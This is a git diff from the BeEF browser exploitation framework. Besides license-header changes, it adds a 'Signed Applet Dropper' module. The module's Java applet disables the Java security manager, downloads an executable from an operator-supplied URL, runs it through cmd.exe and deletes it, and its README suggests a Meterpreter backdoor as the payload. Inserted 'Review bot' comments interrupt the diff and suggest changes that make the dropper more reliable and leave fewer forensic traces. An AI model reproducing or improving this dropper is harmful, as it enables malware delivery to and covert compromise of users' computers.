b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var result = "command sent"; diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml index 730bb4c79..5f1cb6d94 100644 --- a/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml +++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb index d69389b9f..24bd2ad02 100644 --- a/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb +++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # This module is a port of the same module from BeEF-0.4.0.0 # It has not been tested diff --git a/modules/exploits/local_host/safari_launch_app/command.js b/modules/exploits/local_host/safari_launch_app/command.js index 91970c842..80be2851b 100755 --- a/modules/exploits/local_host/safari_launch_app/command.js +++ b/modules/exploits/local_host/safari_launch_app/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var baseTag = document.createElement('base'); baseTag.setAttribute('id', 'sla_<%= @command_id %>'); diff --git a/modules/exploits/local_host/safari_launch_app/config.yaml b/modules/exploits/local_host/safari_launch_app/config.yaml index 13200a95d..430662635 100755 --- a/modules/exploits/local_host/safari_launch_app/config.yaml +++ b/modules/exploits/local_host/safari_launch_app/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/local_host/safari_launch_app/module.rb b/modules/exploits/local_host/safari_launch_app/module.rb index 50eb85b4a..cde7068cf 100755 --- a/modules/exploits/local_host/safari_launch_app/module.rb +++ b/modules/exploits/local_host/safari_launch_app/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Safari_launch_app < BeEF::Core::Command 
diff --git a/modules/exploits/local_host/signed_applet_dropper/README.txt b/modules/exploits/local_host/signed_applet_dropper/README.txt
new file mode 100644
index 000000000..3148891d4
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/README.txt
@@ -0,0 +1,22 @@
+--- How to use this module ---
+-- antisnatchor:
+ - the applet has been compiled with Java 1.6.0 update 0 in order to be compatible with every JRE > 1.6.x (1.7.x included)
+ - tested with IE8 on XP SP3, and IE10 on Win7
+ - tested with JRE 1.6.x and 1.7.x
+
+ - I advise you to recompile/re-sign the applet yourself, the following are the required steps to compile and self-sign the applet.
+NOTE: Best results are obtained signing the applet with a valid Code Signing certificate.
+
+ - Ideally the dropper is a packed backdoor (Meterpreter?) that connects back to your server (for instance a Metasploit multi/handler).
+
+1. compile the two classes
+javac SignedApplet.java SM.java
+
+2. create a JAR
+jar cvf SignedApplet.jar SignedApplet.class SM.class
+
+3. generate a keystore to self-sign the applet
+keytool -keystore tmp -genkey
+
+4. sign the applet
+jarsigner -keystore tmp signedAppletCmdExec.jar mykey
diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SM.class b/modules/exploits/local_host/signed_applet_dropper/applet/SM.class
new file mode 100755
index 000000000..e5e180b79
Binary files /dev/null and b/modules/exploits/local_host/signed_applet_dropper/applet/SM.class differ
diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SM.java b/modules/exploits/local_host/signed_applet_dropper/applet/SM.java
new file mode 100755
index 000000000..14d38bb9d
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/applet/SM.java
@@ -0,0 +1,13 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ *
+ * author: antisnatchor
+*/
+import java.security.*;
+public class SM extends SecurityManager {
+ @Override
+ public void checkPermission(Permission perm) {
+ return;
+ }
+}
\ No newline at end of file
diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class
new file mode 100755
index 000000000..bc6ef79b5
Binary files /dev/null and b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class differ
diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar
new file mode 100755
index 000000000..ee54b1118
Binary files /dev/null and b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar differ
diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java
new file mode 100755
index 000000000..697f5d59b
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java
@@ -0,0 +1,87 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ *
+ * author: antisnatchor
+*/
+import java.applet.*;
+import java.awt.*;
+import java.io.*;
+import java.util.*;
+import java.net.URL;
+
+public class SignedApplet extends Applet {
+
+ public static String debug = "false";
+ public static String bin_url = "";
+ public static String bin_path = "";
+ public static boolean download = false;
+
+ public void init(){
+ bin_url = (String)getParameter("url");
+ String bin_rand_name = Long.toString(Math.abs((new Random()).nextLong()), 36);
+ bin_path = System.getProperty("java.io.tmpdir") + File.separator + bin_rand_name + ".exe";
+
+ // grab operating system -> not used atm
+ // TODO: make the applet compatible also with Linux/OSX
+ String os = System.getProperty("os.name").toLowerCase();
+ execute();
+ }
+
+ public SignedApplet(){
+ super();
+ SecurityManager sm = new SM();
+ System.setSecurityManager(sm);
+ return;
+ }
+
+ public static boolean download(){
+ boolean success = false;
+ try{
+ URL url = new URL(bin_url);
+ InputStream is = url.openStream();
+ BufferedInputStream isbuf = new BufferedInputStream(is);
+ File bin_out = new File(bin_path);
+ OutputStream out = new BufferedOutputStream(new FileOutputStream(bin_out));
+ byte[] buf = new byte[1024];
+ for (;;){
+ int bs = isbuf.read(buf);
+ if (bs <= 0) break;
+ out.write(buf, 0, bs);
+ }
+ out.flush();
+ out.close();
+ is.close();
+ success = true;
+ return success;
+ }catch(Exception e){
+ return success;
+ }
+ }
+
+ public static String execute() {
+ String result = "";
+ String command = "";
+ try{
+ boolean downloadOk = download();
+ System.out.println("Download [" + downloadOk + "] - bin_path [" + bin_path + "]");
+ result = "Download [" + downloadOk + "] - bin_path [" + bin_path + "]";
+
+ if(downloadOk){
+ // TODO: make the applet compatible also with Linux/OSX
+ command = "cmd.exe /c \"" + bin_path + "\"";
+ Process p = Runtime.getRuntime().exec(command);
+ p.waitFor();
+ /// delete dropped binary
+ new File(bin_path).delete();
+ result += "\n\nExecution OK.";
+ }else{
+ //downloading of dropper failed, catch error..
+ result = "Download error.";
+ }
+ }catch (Exception e) {
+ result = "Exception!!!: \n";
+ }
+ return result;
+ }
+}
diff --git a/modules/exploits/local_host/signed_applet_dropper/command.js b/modules/exploits/local_host/signed_applet_dropper/command.js
new file mode 100755
index 000000000..3cd74f3b0
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/command.js
@@ -0,0 +1,28 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/applet/SignedApplet.jar';
+ var applet_name = '<%= @applet_name %>';
+ var dropper_url = '<%= @dropper_url %>';
+ var ie_only = '<%= @ie_only %>';
+
+ function attach(){
+ beef.dom.attachApplet('signed_applet', applet_name, 'SignedApplet.class',
+ null, applet_archive, [{'url':dropper_url}]);
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet added to the DOM.');
+ }
+
+ if(ie_only == "on"){
+ if(beef.browser.isIE()){
+ attach();
+ }
+ }else{
+ attach();
+ }
+});
diff --git a/modules/exploits/local_host/signed_applet_dropper/config.yaml b/modules/exploits/local_host/signed_applet_dropper/config.yaml
new file mode 100755
index 000000000..4110ef9ec
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/config.yaml
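Review bot: `download()` leaks both streams and leaves a partially written `.exe` in `java.io.tmpdir` whenever `openStream()` or a read throws, because the `close()` calls and the delete of `bin_path` only sit on the success path of the `try` and in `execute()` respectively. Moving the closes into a `finally` and deleting `bin_path` when `success` is false keeps a failed drop from leaving an open handle and a forensic artifact behind; the rewrite below stays on Java 1.6 syntax as the README requires. While there, `Runtime.exec(String)` tokenizes the command on whitespace before `cmd.exe` sees it, so a temp path containing a space is split; `Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", bin_path})` avoids the hand-built quoting. Note too that the `result` string assembled in `execute()` only ever reaches `System.out`, so the BeEF side never learns whether the download or the execution succeeded.
```java
// … unchanged: header, fields, init(), constructor …
public static boolean download(){
    boolean success = false;
    InputStream is = null;
    OutputStream out = null;
    try{
        is = new BufferedInputStream(new URL(bin_url).openStream());
        out = new BufferedOutputStream(new FileOutputStream(new File(bin_path)));
        byte[] buf = new byte[1024];
        int bs;
        while ((bs = is.read(buf)) > 0){
            out.write(buf, 0, bs);
        }
        out.flush();
        success = true;
    }catch(Exception e){
        // success stays false; cleanup happens in finally
    }finally{
        try{ if (out != null) out.close(); }catch(IOException e){}
        try{ if (is != null) is.close(); }catch(IOException e){}
        // never leave a half-written dropper in the temp dir
        if (!success) new File(bin_path).delete();
    }
    return success;
}
// … unchanged: execute() …
```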
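Review bot: When `ie_only` is `"on"` and `beef.browser.isIE()` is false, the inner `if` falls through without any `beef.net.send`, so the command never reports back and stays pending in the BeEF UI. Add an `else` on the inner check: `} else { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Skipped: not Internet Explorer.'); }`. The `'Applet added to the DOM.'` result is sent synchronously right after `attachApplet`, before the JVM has fetched the jar, so it confirms DOM insertion only, not that the applet ran; a comment above the send, `// reports DOM insertion only; applet load/execution is not observable from here`, would keep readers from over-trusting it. `applet_name` and `dropper_url` are also interpolated into single-quoted JS literals unescaped, so an operator value containing `'` breaks the script.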
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ signed_applet_dropper:
+ enable: true
+ category: ["Exploits", "Local Host"]
+ name: "Signed Applet Dropper"
+ description: "Injects a Signed Java Applet (compiled with Java 1.6.0 in order to be compatible with every JRE from 1.6.0 to latest 1.7) that downloads a dropper and executes it.
Currently works only on Windows.

Internet Explorer is the only browser that doesn't implement Click to Play for plugins, that's what the IE only checkbox is meant for."
+ authors: ["antisnatchor"]
+ target:
+ user_notify: ["All"]
diff --git a/modules/exploits/local_host/signed_applet_dropper/module.rb b/modules/exploits/local_host/signed_applet_dropper/module.rb
new file mode 100755
index 000000000..1cc350aa5
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Signed_applet_dropper < BeEF::Core::Command
+
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar', '/applet/SignedApplet', 'jar')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SM.class', '/applet/SM', 'class')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class', '/applet/SignedApplet', 'class')
+
+ end
+
+ def self.options
+ @configuration = BeEF::Core::Configuration.instance
+ beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+ return [
+ {'name' => 'dropper_url', 'ui_label' => 'Dropper URL', 'value' => 'http://dropper_url/'},
+ {'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Oracle Secure Applet'},
+ {'name' => 'ie_only', 'ui_label' => 'Internet Explorer only?', 'type' => 'checkbox', 'checked' => 'checked' },
+
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/local_host/window_mail_client_dos/command.js b/modules/exploits/local_host/window_mail_client_dos/command.js
index 38eebf375..b908f1f0f 100644
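Review bot: `pre_send` binds the jar and both class files under `/applet/…` but nothing ever unbinds them, so a signed dropper applet stays served at a predictable path for the life of the BeEF process, whereas the m0n0wall module added in this same commit does unbind its asset in `post_execute`. Copying that pattern here as-is would be wrong, because command.js reports its result as soon as the element is attached, before the JVM has fetched the jar, so an unbind in `post_execute` would race the applet load; either keep the bindings and say so with `# assets stay bound: the JVM fetches the jar after the command result is sent`, or unbind from a later hook if the framework offers one. Separately, `self.options` computes `beef_host` and never uses it; either drop the two lines or use it to prefill `dropper_url` in place of the `'http://dropper_url/'` placeholder.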
--- a/modules/exploits/local_host/window_mail_client_dos/command.js +++ b/modules/exploits/local_host/window_mail_client_dos/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { // container iframe diff --git a/modules/exploits/local_host/window_mail_client_dos/config.yaml b/modules/exploits/local_host/window_mail_client_dos/config.yaml index 25a643768..898b5183b 100644 --- a/modules/exploits/local_host/window_mail_client_dos/config.yaml +++ b/modules/exploits/local_host/window_mail_client_dos/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/local_host/window_mail_client_dos/module.rb b/modules/exploits/local_host/window_mail_client_dos/module.rb index d752b3e4b..8f311e62b 100644 --- a/modules/exploits/local_host/window_mail_client_dos/module.rb +++ b/modules/exploits/local_host/window_mail_client_dos/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Windows_mail_client_dos < BeEF::Core::Command 
diff --git a/modules/exploits/m0n0wall/COPYING.GPL b/modules/exploits/m0n0wall/COPYING.GPL
new file mode 100644
index 000000000..d511905c1
--- /dev/null
+++ b/modules/exploits/m0n0wall/COPYING.GPL
@@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. 
+ + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. 
The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. 
(Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. 
You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. 
+ +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. 
If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. 
If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it 